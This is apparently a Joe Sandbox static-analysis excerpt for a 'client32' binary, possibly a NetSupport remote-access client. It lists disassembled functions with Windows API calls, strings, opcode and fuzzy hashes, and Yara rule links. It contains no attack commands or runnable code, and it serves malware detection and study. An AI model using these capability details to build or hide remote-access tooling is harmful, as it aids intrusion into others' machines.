                                                                              • API String ID: 490496107-2775872530
                                                                              • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                              • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                              Function 110416A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                              • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                              • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                              • API String ID: 2388757878-1455766584
                                                                              • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                              • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                              • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                              • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                              Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                              • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                              • ShowWindow.USER32(00000000), ref: 110234D7
                                                                              • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                              • ShowWindow.USER32(00000000), ref: 11023524
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 3823882759-1986719024
                                                                              • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                              • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                              • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                              • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                              Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(secur32.dll,EE49F673,?,?,?), ref: 111470D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                              • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                              • timeGetTime.WINMM(?,?), ref: 11147113
                                                                              • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                              • API String ID: 2282859717-3523682560
                                                                              • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                              • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                              • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                              • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                              Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                              • SelectObject.GDI32(?,?), ref: 11037872
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                              • GetBkColor.GDI32(?), ref: 11037A5C
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                              • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                              • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                              • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                              • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                              • String ID:
                                                                              • API String ID: 649858571-0
                                                                              • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                              • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                              • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                              • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                              Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFocus.USER32(?), ref: 110254CE
                                                                              • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                              • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                              • ShowCaret.USER32(00000000), ref: 11025515
                                                                              • DestroyCaret.USER32 ref: 11025529
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Caret$CreateDestroyFocusItemShow
                                                                              • String ID:
                                                                              • API String ID: 3189774202-0
                                                                              • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                              • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                              • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                              • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                              Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11035267
                                                                              • _memmove.LIBCMT ref: 1103528B
                                                                              • _memmove.LIBCMT ref: 110352C5
                                                                              • _memmove.LIBCMT ref: 110352E1
                                                                              • std::exception::exception.LIBCMT ref: 1103532B
                                                                              • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                              • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                              Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 110193F7
                                                                              • _memmove.LIBCMT ref: 1101941B
                                                                              • _memmove.LIBCMT ref: 11019455
                                                                              • _memmove.LIBCMT ref: 11019471
                                                                              • std::exception::exception.LIBCMT ref: 110194BB
                                                                              • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                              • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                              Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                              • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                              • MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
                                                                              • GetClientRect.USER32(?,?), ref: 11119508
                                                                              • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                              • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                              • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                              • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                              Strings
                                                                              • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                              • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                              • API String ID: 4172599486-2052393828
                                                                              • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                              • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                              • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                              • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                              Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                              • wsprintfA.USER32 ref: 1100977F
                                                                              • wsprintfA.USER32 ref: 11009799
                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                              • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                              • API String ID: 559337438-1872371932
                                                                              • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                              • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                              • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                              • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
